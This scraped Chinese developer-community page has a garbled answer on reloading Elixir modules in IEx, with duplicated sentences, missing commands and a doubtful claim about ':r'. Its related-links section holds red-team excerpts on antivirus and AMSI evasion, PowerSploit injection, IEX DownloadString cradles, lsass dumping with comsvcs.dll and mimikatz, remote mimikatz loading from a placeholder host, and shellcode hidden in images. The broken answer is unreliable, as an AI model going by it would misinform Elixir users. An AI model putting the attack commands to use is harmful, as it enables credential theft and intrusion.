在不离开IEx的情况下重新编译和加载IEx

，可以通过以下步骤实现：

在IEx中使用:c命令来编译指定的模块。例如，如果要重新编译名为MyModule的模块，可以执行以下命令：
在IEx中使用:c命令来编译指定的模块。例如，如果要重新编译名为MyModule的模块，可以执行以下命令：
如果要重新加载已编译的模块，可以使用:l命令。例如，如果要重新加载名为MyModule的模块，可以执行以下命令：
如果要重新加载已编译的模块，可以使用:l命令。例如，如果要重新加载名为MyModule的模块，可以执行以下命令：
如果要重新加载整个应用程序，可以使用:r命令。例如，如果要重新加载名为my_app的应用程序，可以执行以下命令：
如果要重新加载整个应用程序，可以使用:r命令。例如，如果要重新加载名为my_app的应用程序，可以执行以下命令：

需要注意的是，重新编译和加载模块可能会导致之前已经存在的模块和函数被覆盖或更新。因此，在执行这些操作之前，建议先备份相关代码或确保重新加载的模块与之前的版本兼容。

此外，腾讯云提供了一系列与云计算相关的产品和服务，包括云服务器、云数据库、云存储、人工智能等。您可以访问腾讯云官方网站（https://cloud.tencent.com/）了解更多详细信息和产品介绍。

相关·内容

(译) Understanding Elixir Macros, Part 4 - Diving Deeper

但是在适合使用宏的情况下, 你不应该仅仅因为有人声称宏是不好的, 就不使用它....我们从编译器环境中获取各种数据, 然后计算结果, 最后将所有内容打印到屏幕上. 该代码依赖于 __ENV__ 特殊形式, 可用于在最终 AST 中注入各种编译时信息(例如行号和文件)....__ENV__ 是一个结构体, 每当你在代码中使用它时, 它将在编译时扩展为适当的值. 因此, 只要在代码中写入 __ENV__.file. 文件生成的字节码将包含包含文件名的(二进制)字符串常量....宏结束处的 nil 确保我们不生成任何东西（我们生成的 nil 通常与调用者代码无关）. 这允许我进一步构建片段而不注入代码....毕竟, 宏只是一个函数, 当调用它时, 包含的模块已经编译并加载到编译器的 VM 中(否则, 宏无法运行).

973 0

(译) Understanding Elixir Macros, Part 1 Basics

我原本计划在我即将出版的《Elixir in Action》一书中讨论这个主题, 但最终决定不这么做, 因为这个主题不符合这本书的主题, 这本书更关注底层 VM 和 OTP 的关键部分....为了理解它是如何工作的, 你需要学习一点编译过程和AST的知识. 无论是宏还是原地代码生成, 我们都在编译的过程中对抽象语法树 (AST) 做了某些变换....你可以确定你的代码不会被重新定义, 除非使用到了代码升级或是一些动态的代码插入技术 (这不在本文讨论范围)....在这种情况下, AST 片段是一个包含如下元素的三元组 (triplet): 一个原子 (atom) 表示所要进行的操作 (:+) 表达式上下文 (context, 例如 imports 和 aliases...mangled_result 表示 Elixir 编译器会销毁所有在宏里引用的临时变量.

1803 0

sqlps.exe白名单的利用（过S60！）

9331 0

Powershell免杀从入门到实践

前言在之前发布的一篇渗透技巧之Powershell实战思路中，学习了powershell在对抗Anti-Virus的方便和强大。...处理powershell 利用cmd的混淆以不同的姿势调用powershell 如利用win10环境变量截取出powershell %psmodulepath:~24,10% 处理IEX 为IEX设置别名...这时候我们就得到了powershell版的一个加载器，继续尝试修改该加载器本身的一些特征。...对func_get_delegate_type，func_get_proc_address两个函数重命名替换，对函数里面的一些变量进行重新定义重命名$DoIt为$aaaa 修改IEX为I`EX 修改Invoke...powershell转exe 在修改了加载器之后，我们还可以通过powershell代码将其加载器转换为exe程序。借助Win-PS2EXE项目，通过ps2exe.ps1脚本将加载器转为exe文件。

2.8K3 0

(译) Understanding Elixir Macros, Part 3 - Getting into the AST

最后, 由于宏在编译期间运行, 因此可以通过将计算转移到编译时来优化一些代码. 因此, 肯定会有适合宏的情况, 您不应该害怕使用它们....探索 AST 结构目前, 关于 AST 结构的文档不多. 然而, 在 shell 会话中可以很简单地探索和使用 AST, 我通常就是这样探索 AST 结构的....如你所见, AST 背后通常有一些逻辑和意义. 我不会在这里写出所有 AST 的形状, 但会在 iex 中尝试你感兴趣的简单的结构来探索 AST. 这是一个逆向工程, 但不是火箭科学....然后, 在 quoted 的代码中, 我们通过分别计算左边和右边重新解释 == 操作（第 4 行和第 5 行）, 然后是整个结果（第 7 行）....记住, 在 quoted 时, 我们不组装字符串, 而是组装 AST 片段. 所以, 当我们想生成一个二进制操作代码时, 我们需要注入一个正确的 AST, 它（如前所述）与双参数的函数调用相同.

1495 0

工具| PowerShell的内网渗透之旅(二)

PowerSploit由以下模块和脚本组成：模块说明 CodeExecution 在目标主机执行代码 ScriptModification 在目标主机上创建或修改脚本代码 Persistence 后门脚本...1).前面步骤和a的步骤一致，唯一不同的就是在最后的命令上，首先，查看我们需要注入的进程，建议可注入到系统的进程，因为一旦进程关闭，那么监听也将终断，因此系统进程一般不会被关闭，注意：不能注入到像360...注意：和a类似的，若关闭notepad进程，则连接中断。 c.调用invoke-dllinjection将DLL注入到进程中。...注意：这里用的全端口扫描，不建议这么做，耗费时间太长，可以扫描一些常规端口。 b.调用Get-HttpStatus扫描目标站点的目录。 1）.通过IEX下载并调用Get-HttpStatus。 ?...b.调用Invoke-NinjaCopy复制一些系统无法复制的文件如sam文件。 1).通过IEX下载并调用Get-NinjaCopy。正常情况下复制： ?

1.9K6 0

「无文件」攻击方式渗透实验

集成了框架、脚本和各种payload。这些脚本是由Nishang的作者在真实渗透测试过程中有感而发编写的，具有实战价值。...目录下面，再把用到的提权exp（ms1564.exe）放到web根目录下面然后在反弹的shell里面运行 IEX(New-ObjectNet.WebClient).DownloadString('http...因为这是60字节webshell的杂技，所以我用第三种方法进入到内网：首先在黑客的web里面放入特殊处理的xsocks.exe，然后用poweshell加载 IEX (New-ObjectNet.WebClient...编译 4.在win上不能用gcc去编译 5.编译采用/MT 或者/MTd 6.如果要传递参数的话把int main(int argc char **argv)改成 int main(){ LPWSTR...先下载到本地看看什么效果然后用编译好的ms15-051.exe用powershell加载一下

2.4K9 0

如何使用PowerShx摆脱软件限制运行PowerShell

关于PowerShx PowerShx是一款功能强大的PowerShell软件，在该工具的帮助下，广大研究人员可以在目标主机上摆脱任何软件的限制从而执行PowerShell代码。...PowerShx是PowerShdll项目的一个扩展项目，并且提供了AMSI绕过和运行PS Cmdlet的功能。...的情况下运行PowerShell；AMSI绕过功能；直接通过命令行工具或PowerShell文件运行PowerShell脚本；导入PowerShell模块和执行PowerShell Cmdlet；...> -c 加载一个脚本并运行一个PS cmdlet rundll32 PowerShx.dll,main -w 在一个新的窗口中开启一个交互式终端...脚本 PowerShx.exe -f 以参数形式传递和运行脚本 PowerShx.exe -f -c 加载一个脚本并运行一个

1.5K1 0

四十六.Powershell和PowerSploit脚本攻防万字详解

总之，希望该系列文章对博友有所帮助，写文不易，大神们不喜勿喷，谢谢！...(2) 执行策略为防止恶意脚本的执行，PowerShell有一个执行策略，在默认情况下，这个执行策略被设为首先。...dir或ls均可，而且PowerShell命令不区分大小写。...ExecutionPolicy Bypass：绕过执行安全策略，这个参数非常重要，在默认情况下，PowerShell的安全策略规定了PowerShell不允许运行命令和文件。...NoProfile（-NoP）：PowerShell控制台不加载当前用户的配置文件 Noexit：执行后不退出Shell，这在使用键盘记录等脚本时非常重要再次强调，PowerShell脚本在默认情况下无法直接执行

5731 0

Elixir 连续运行时代码覆盖率采集方案

Step 3、接下来让我们通过 Erlang 的标准库 beam_lib 文件查看 Beam 文件中的 chunk: # 打开 iex console iex -S mix 查看编译后 BEAM 文件...chunks 是和之前的图对应的....Elixir 源码的编译为 BEAM 文件的过程可能和你想象的不太一样, 不直接从 Elixir 的 AST, 经过编译器后端的处理后成为可执行的 BEAM Code, 中间还有一个过程, 如下图所示:...Step 2、在 Elixir AST 阶段, 一些自定义的和内置的宏（Macros）还没有被展开, 这些宏在 Expanded Elixir AST 展开为最终的 Elixir AST（final Elixir...基于此, 我们可以实现在 Elixir Application 不停止运行的情况下, 配合大型（集成 & 系统）测试能力, 完成代码覆盖率的收集. 4.

3485 0

(译) Understanding Elixir Macros, Part 2 - Micro Theory

这是 Elixir 中的宏系列的第二篇. 上一次我们讨论了编译过程和 Elixir AST, 最后讲了一个基本的宏的例子 trace. 今天, 我们会更详细地讲解宏的机制....只有在 Tracer 模块完全编译好并对编译器可用的情况下, 我们才能调用 trace 宏....在上面两种情况中, 宏都必须创建一个不 hygienic 的变量, 而且必须在宏所引用的代码之外可见. 为达到这个目的, 可以使用 var! 结构....} end {:{}, [], [1, 2, 3]} 由于列表和二元元组在被引用时能保留结构, 所以关键词列表（keywords list）也可以: iex(7)> quote do [a: 1, b:...理想情况下, 当我们这样做时, 我们不需要关心输入 AST 的内容, 在我们的例子中, 我们只需要在生成的函数中注入函数体, 而不需要关心函数体中实际有什么. 测试这个宏很简单.

1344 0

四十二.Powershell恶意代码检测系列 (3)PowerSploit脚本渗透详解

同时，更希望您能与我一起操作和进步，后续将深入学习网络安全和系统安全知识并分享相关实验。总之，希望该系列文章对博友有所帮助，写文不易，大神们不喜勿喷，谢谢！...(2) 执行策略为防止恶意脚本的执行，PowerShell有一个执行策略，在默认情况下，这个执行策略被设为首先。...ExecutionPolicy Bypass：绕过执行安全策略，这个参数非常重要，在默认情况下，PowerShell的安全策略规定了PowerShell不允许运行命令和文件。...NoProfile（-NoP）：PowerShell控制台不加载当前用户的配置文件 Noexit：执行后不退出Shell，这在使用键盘记录等脚本时非常重要再次强调，PowerShell脚本在默认情况下无法直接执行...，以将受管理的DLL加载到内存中 Remove-Comments.ps1 从脚本中删除注释和多余的空白 Persistence(权限维持) New-UserPersistenceOption 为添加持久性函数配置用户级持久性选项

3.1K3 0

(译) Understanding Elixir Macros, Part 6 - In-place Code Generation

bar # <- 由于 bind_quoted 而可访问 end 代码注入 vs 数据传输我们要面临的另一个问题是: 从宏传递到调用者上下文的内容在默认情况下是注入的, 而不是传输的....我们将其注入到目标 AST 中, 注入意味着 {1,2,3} 本身被视为一个 AST 片段, 这显然是错误的. 在这种情况下, 我们真正想要的是数据传输....因为这个 AST 现在是在调用者的上下文中形成的, 在这个上下文中我们有可用的 action 和 state 变量. 第二个表达式会用到这些变量的内容....一定要记住 — 在展开阶段, 宏相当于 AST 片段的普通组合. 如果你理解调用者的上下文和宏输入, 那么直接执行转换或在必要时通过延迟执行转换并不算难. 本系列绝不可能涵盖方方面面和所有的细节....如果你想了解更多, quote/2 special form 的文档是一个不错的地方. 您还可以在 Macro 和 Code 模块中找到一些有用的帮助程序.

1754 0

Windows下的包管理器Chocolatey

例如Debian和Ubuntu中的apt-get命令，Fedora的yum以及新的dnf命令，还有Arch中的pacman。...如果还是嫌上面的太长的话，可以试试这个（在管理员权限下的Powershell中）： iwr https://cin.st | iex 命令运行完成之后，输入choco命令，如果显示出了版本号，说明安装成功了...如果已经安装了，可以再次运行安装命令，这样可以重新安装到你指定的位置。上面定义的安装位置是Chocolatey的安装位置。对于Chocolatey安装的软件的位置就不容易更改了。...可能遇到的问题操作超时这是由于网络不畅通造成的，多试几次就行了。如果你的网络不好，建议还是直接使用下载工具到官网上下载安装软件包比较好。无法加载文件，因为在此系统上禁止运行脚本。...这是由于系统的执行策略造成的。有兴趣的同学可以到微软官方说明这里了解详细信息。默认情况下是严格模式，允许执行命令但是禁止执行脚本。输入以下命令将执行策略设置为允许签名的远程脚本就行了。

1.3K2 0

神器 | windows包管理工具

在Windows平台，通过chololate，我们同样可以做到通过一条命令完成应用及依赖项的安装。...).DownloadString('https://chocolatey.org/install.ps1')) 执行完毕且没有错误提示的情况下表示安装成功。...upgrade - 通过各种源升级软件包 uninstall - 卸载软件包 pack - 打包nuspec至nupkg push - 推送编译好的nupkg new - 从模板中为chocolate...up version - [不推荐] 将在v1版移除，使用 choco outdated 或 cup -whatif 代替 update - [不推荐] 为未来版本保留此命令...安装成功，在chocolatey目录下： ? 执行thrift命令也ok，说明thrift的环境变量自动设置好了： ?

3.1K3 0

红队技巧-导出凭据和密码

前言红队中各种抓取密码凭据的方法，文末彩蛋，内附工具链接，以及我制作的过360的minikatz的版本，各位请享用，最近筹备重新开blog，记录学习计划，不然知识我学完立马就忘了，与大家一起学习！...前提：在powershell中运行，管理员权限以上命令： C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump...前提：管理员权限以及以上，建议自己编译源码去掉一些特征字符，一些不必要的语句命令： mimikatz_exe "sekurlsa::minidump lsass.dump" "sekurlsa::logonpasswords...彩蛋福利直接去下载github上面的release版本百分之百被杀的，我这把源码拉下来，自己编译，去除一些特征。请看：过360的minikatz截图： ? ?...不知道是不是我刚更新没有关网络，把我64位的搞死了，但是32位的依然坚挺！然后接着保险起见，加壳工具包里面有我编译好的一些工具，懂得都懂嗷，不会的百度。 ?

2.3K1 0

免杀｜利用RGB隐写隐藏Shellcode

Invoke-PSImage.ps1 文件在同一目录： image-20210921162356384 远程加载执行以下命令即可生成一个带有 Shellcode 的图片 shell.png： #...我们还可以将上面那段加载的命令编译生成可执行文件，这里我们直接使用网上找的脚本进行编译： •Convert-PS1ToExe.ps1 function Convert-PS1ToExe{ param...美中不足的是有个弹窗。使用远程加载固然方便，但是由于生成的图片非常大，远程加载所耗的时间较长，所以我们可以尽可能的本地加载。...([System.Text.Encoding]::ASCII.GetString($o[0..3550])) 执行上面的命令，在本地加载图片里的 Shellcode： image-20210921165619277...下面，我们将这种本地加载中的加载命令也用之前的方式编译成可执行文件： image-20210921172946177 image-20210921173310693 此时执行 Loader.exe

2K2 0

通过 vfox 安装管理多版本 Erlang 和 Elixir

因为目前 vfox 的两个管理 Erlang 和 Elixir 版本的插件实现上还没有去支持在 Windows 操作系统下的管理，所以本篇文章的示例环境主要是 Ubuntu 20.04 Linux 环境...Erlang 的安装是通过对应版本的源码进行安装的，所以我们需要有对应的编译工具链，这里以 Ubuntu 20.04 为例： sudo apt-get -y install build-essential...因为是从源码编译安装的, 所以安装过程会花费点时间。当你看到如下信息，就表明安装完成了。 compile info....... ......接下来开始安装 Elixir 吧安装 Elixir 因为安装 Elixir 也是从对应版本的源码进行编译安装的，Elixir 的编译需要依赖到 Erlang，我们先让当前使用的 shell 能找到刚才安装好的...Erlang/OTP 和 Elixir 版本的插件同时也支持在 MacOS Darwin 下管理多个版本。

1511 0

实战中如何绕过杀软用mimikatz获取账号密码

所以采用混淆加密方式来绕过杀软，混淆脚本地址如下 https://github.com/the-xentropy/xencrypt 使用AES加密和Gzip / DEFLATE压缩，每次调用都会生成一个唯一但是功能相同的脚本...混淆脚本采用AES加密和Gzip / DEFLATE压缩，含有powershell2.0版本不支持调用的方法。难搞哦。...360这个zz，在判断PowerShell下载攻击后，接下来一段时间会直接对powershell拒绝访问，实战直接执行下面的命令） powershell "IEX (New-ObjectNet.WebClient...既然可以远程加载powershell绕过杀软，那远程加载exe也同样可以，powershell加载exe进内存运行需要PowerSploit中的Invoke-ReflectivePEInjection脚本...Invoke-ReflectivePEInjection -PEUrlhttp://x.x.x.x/mimikatz.exe-ExeArgs"sekurlsa::logonpasswords" -ForceASLR -PEUrl ：包含要加载和执行的

1.8K2 0

一种 Powershell 的混淆方式绕过 AMSI 检测

在这里，iex 在数据变量中执行代码，将其转换为字符串，而错误则重定向到空值，然后将其存储在 $sendback 变量中。...因此，将此转换为 IP 的代码如下。在这里，我将 IP 的十六进制存储在 px变量中，然后将其转换为 IP 并将其存储在 p 变量中。...如果你以前玩过 EDR，那么众所周知，这是 IEX 的全名。默认情况下，调用表达式总是被标记为恶意的，因为它用于执行命令。...因此，我们将确保有效负载中不存在任何字符串或任何编码版本的 IEX，但我们仍将使用此命令。记住，IEX 本身不是恶意的。它和任何其他微软 API 一样好。...最后，我们将整个有效负载与 sleep 命令一起放入一个短短的真循环中，这样即使我们的连接中断，它也会 sleep X 秒，然后尝试重新连接到我们的服务器。

4.5K4 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云